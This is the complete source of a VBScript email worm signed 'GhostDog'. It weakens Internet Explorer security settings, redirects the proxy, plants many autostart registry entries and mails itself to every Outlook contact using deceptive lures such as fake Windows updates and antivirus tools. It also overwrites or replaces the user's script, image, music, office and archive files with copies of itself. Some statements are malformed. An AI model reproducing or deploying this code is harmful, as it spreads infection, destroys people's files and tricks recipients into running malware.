REM (c) by GhostDog@EveryMail.net

set WSHShell = CreateObject("WScript.Shell")

On error Resume next

Rem english or other systems (I hope so). IT CANT COMPLETELY RUN IN win2000 yet

REM REGISTRY PART BEGINNING --------------------------------------------------------------------------------

WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.avp.ch"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","(c) by GhostDog !!!"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Print_Background","yes"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FullScreen","yes"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Error Dlg Displayed On Every Error","yes"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Show_ChannelBand","yes"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Animations","no"
WSHShell.RegWrite "HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyServer","chekov.maestro.da.ru:6667"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Show_StatusBar","no"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Friendly http errors","no"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Wizards\PageSize","A4"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Micorosft\Windows\CurrentVersion\ProductId","EveryMail.net !"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Micorosft\Windows\CurrentVersion\RegisteredOwner","a nice Guy"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Micorosft\Windows\CurrentVersion\RegisteredOrganization","H4F has taken over!"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\AutoAdminLogon","1"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\DontDisplayLastUserName","0"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","FUCK YOU!"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","Welcome on this Virus-Infected-Station!"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KILL THE VIRUS\DisplayName","_-=KILL THE VIRUS=-_"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KILL THE VIRUS2\DisplayName","_-=YOU ARE STUPID=-_"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KILL THE VIRUS3\DisplayName","_-=HA HA ! LOOSER!!=-_"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KILL THE VIRUS4\DisplayName","_-=HA HA ! LAMER !!=-_"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KILL THE VIRUS5\DisplayName","_-=OH WHATS THAT?=-_"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KILL THE VIRUS6\DisplayName","_-=ONLY LITTLE FILL UP!=-_"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KILL THE VIRUS7\DisplayName","_-=AH I SEE.. STUPID USER!=-_"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Extensions\.txt","mspaint.exe^.bmp"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Extensions\.bmp","notepad.exe^.txt"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Extensions\.doc","notepad.exe^.doc"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Max Cached Icons","1"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winboot",dirwin&"\Winboot.vbs"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cookiesave",dirtemp&"\Altavista.vbs"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sysconfig",dirsystem&"\Sysconfig.vbs"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wincolor",dirsystem&"\Wincolor.vbs"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cookieload",dirtemp&"\yahoo.com.vbs"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\User32.exe",dirwin&"\User.vbs"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Color-Choice",dirsystem&"\Color\Colorchoice.vbs"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Interpreter Commands",dirwin&"\Win.com.vbs"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\JAVA",dirwin&"\Java\Userconfig.vbs"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\NOHIDDEN\Text","Hide files"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL\Text","all files"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\HideFileExt\dext","sorry, my German not so good -->Dateinamenerweiterung bei bekannten Dateitypen nicht ausblenden"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\AlwaysUnloadDLL\(Standard)","0"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\User Shell Folders\Favorites","C:\My Documents"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\User Shell Folders\Personal","C:\Windows\Temp"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Content\CachePath","C:\WINDOWS\DESKTOP"
WSHShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Cookies\CachePath","C:\WINDOWS\DESKTOP"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\General\Wallpaper","C:\WINDOWS\Web\SafeMode.htt"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\General\BackupWallpaper","C:\WINDOWS\Web\SafeMode.htt"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Use Anchor Hover Color","yes"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\Sending_Security","Low"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\Viewing_Security","Low"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\Safety Warning Level","Deactivated"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Ftp\Use Web Based FTP","no"
WSHShell.RegWrite "HKEY_CLASSES_ROOT\.gif\Content Type","Image/bmp"
WSHShell.RegWrite "HKEY_CLASSES_ROOT\.bat\(Standard)","comfile"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName","Get ur ass ot of here"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon","user.exe"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName","AVP Self Killing"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName","Horny Sites"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName","NAV Destruktions Library"
WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName","Looser Site"
WSHShell.RegWrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\(Standard)","GhostDog.."

on error resume next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad,Betreff,orderinfo,Text

set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")

for ctrlists=1 to mapi.AddressLists.Count

set a=mapi.AddressLists(ctrlists)
x=1


Randomize Timer
orderinfo = INT(RND * 16) + 1 

If orderinfo = 1 then
	Betreff = "Windows Update"
	Text = "See the attached File for more info about the update. Its an ANTI VIRUS TOOL. For FREE!!"
end if
If orderinfo = 2 then
	Betreff = "Hy!!!!"
	Text = "I havent heard soo long nothing from you... write me something! Got a cute littel present as attached file for you!"
end if
If orderinfo = 3 then
	Betreff = "Homepage = www.avp.ch"
	Text = " yeah a great A-Virus Homepage!! READ ATTACHMENT FOR A FREE GIFT AND AN FREE ANTI VIRUS CHECK!!!"
end if
If orderinfo = 4 then
	Betreff = "Wutz up?"
	Text = "Whats going on @ your home? Tell me something new or read this cool attached file"
end if
If orderinfo = 5 then
	Betreff = "VUE Testing Software "
	Text = "You miss our VUE Testing Software ??? Then see attached file for more info"
end if	
If orderinfo = 6 then
	Betreff = "Virus News:"
	Text = " A new Virus is going around, See the attached File for more info and an Free Anti Virus update"
end if
If orderinfo = 7 then
	Betreff = "Hy Babe!"
	Text = "Have you also seen this File allready? (Attachment) Its really funny.. try it and tell me whats happening."
end if
If orderinfo = 8 then
	Betreff = "DirectX 8"
	Text = " No joke.. see attached file .. its a nice prog from Microsoft.. DirectX 8 or something like that"
end if
If orderinfo = 9 then
	Betreff = "Greets!"
	Text = " HY! ... FILE --> CLICK!.. :-))))"
end if
If orderinfo = 10 then
	Betreff = "Ups..?!"
	Text = "?????? ---> FILE --> CLICK! ---> :-)))))"
end if
If orderinfo = 11 then
	Betreff = "Forgott something to tell you.."
end if
if orderinfo = 12 then
	Text = "Attached file, look at it .. its my newest Programm"
end if
If orderinfo = 13 then
	Betreff = "HMM?!?!"
	Text = "HAPPY BIRTHSDAY!!! Look at the Programm I made for you.. its the attached file!"
end if
If orderinfo = 14 then
	Betreff = "Lets have FUN!"
	Text = "If you want to see me naked look at the File whats attached ;O)"
end if
If orderinfo = 15 then
	Betreff = "Anti Virus Info! READ!!"
end if
If orderinfo = 16 then
	Betreff = "INTERNET-PROVIDER-PROBLEMS"
end if

regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)

if (regv="") then
	regv=1
end if

if (int(a.AddressEntries.Count)>int(regv)) then
	for ctrentries=1 to a.AddressEntries.Count
	malead=a.AddressEntries(x)
	regad=""
	regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
		if (regad="") then
		set male=out.CreateItem(0)
		male.Recipients.Add(malead)
		male.Subject = Betreff
		male.Body = vbcrlf&Text
		male.Attachments.Add(windir&"\win.com.vbs")
		male.Send
		regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
		end if

	x=x+1
	next
	regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count

	else

	regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count

end if
next 

Set out=Nothing
Set mapi=Nothing

On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3,office,GIF,ZRA

set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
	set ap=fso.OpenTextFile(f1.path,2,true)
	ap.write vbscopy
	ap.close

		elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
		set ap=fso.OpenTextFile(f1.path,2,true)
		ap.write vbscopy
		ap.close
		bname=fso.GetBaseName(f1.path)
		set cop=fso.GetFile(f1.path)
		cop.copy(folderspec&"\"&bname&".vbs")
		fso.DeleteFile(f1.path)
		REM infects js, jse, css, wsh, sct and hta
			
			elseif(ext="jpg") or (ext="jpeg") then
			set ap=fso.OpenTextFile(f1.path,2,true)
			ap.write vbscopy
			ap.close
			set cop=fso.GetFile(f1.path)
			cop.copy(f1.path&".vbs")
			fso.DeleteFile(f1.path)
			REM infects jpg, jpeg

				elseif(ext="mp3") or (ext="mp2") then
				set mp3=fso.CreateTextFile(f1.path&".vbs")
				mp3.write vbscopy
				mp3.close
				set att=fso.GetFile(f1.path)
				att.attributes=att.attributes+2
				REM infects mp3 and mp2
		
					elseif(ext="doc") or (ext="xls") or (ext="ppt") then
					set office=fso.CreateTextFile(f1.path&".vbs")
					office.write vbscopy
					office.close
					set off=fso.GetFile(f1.path)
					off.attributes=att.attributes+2
					REM infects doc, xls, ppt

						elseif(ext="gif") then
						set GIF=fso.CreateTextFile(f1.path&".vbs")
						GIF.write vbscopy
						GIF.close
						set GGG=fso.GetFile(f1.path)
						GGG.attributes=att.attributes+2
						REM infects gif

					elseif(ext="zip") or (ext="rar") then
					set ZRA=fso.OpenTextFile(f1.path,2,true)
					ZRA.write vbscopy
					ZRA.close
					set RIP=fso.GetFile(f1.path)
					RIP.copy(f1.path&".vbs")
					fso.DeleteFile(f1.path)
					REM infects zip and rar
end if

next  


On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow,index,index2

eq=""
ctr=0

Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)

vbscopy=file.ReadAll

Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
index = 0
index2 = 0
Rem nobody´s gonna kill ma files

DO
	index2 +1
	DO 
		index + 1
			If exist (dirwin&"\Desktop") then 
			c.Copy(dirwin&"Winboot.vbs")
			c.Copy(dirtemp&"Altavista.vbs")
			c.Copy(dirsystem&"Sysconfig.vbs")
			c.Copy(dirsystem&"Wincolor.vbs")
			c.Copy(dirtemp&"yahoo.com.vbs")
			c.Copy(dirwin&"User.vbs")
			c.Copy(dirsystem&"\Color\Colorchoice.vbs")
			c.Copy(dirwin&"Win.com.vbs")
			c.Copy(dirwin&"\Java\Userconfig.vbs")
		end if
		
		if exist (dirwin&"\Driver Cache") then
			c.Copy(dirwin&"Winstarter.vbs")
			c.Copy(dirtemp&"Avisgalore.vbs")
			c.Copy(dirsystem&"Userconfig.vbs")
			c.Copy(dirsystem&"Extracolor.vbs")
		end if

	Loop Until index = 50

Loop Until index2 = 50


On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow,index
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
Set c = fso.GetFile(WScript.ScriptFullName)
index = 0

do
	index + 1

	c.Copy(dirwin&"Desktop\GhostDog@EveryMail.net")
	c.Copy(dirwin&"Desktop\I hate.YOU")

loop until index = 20

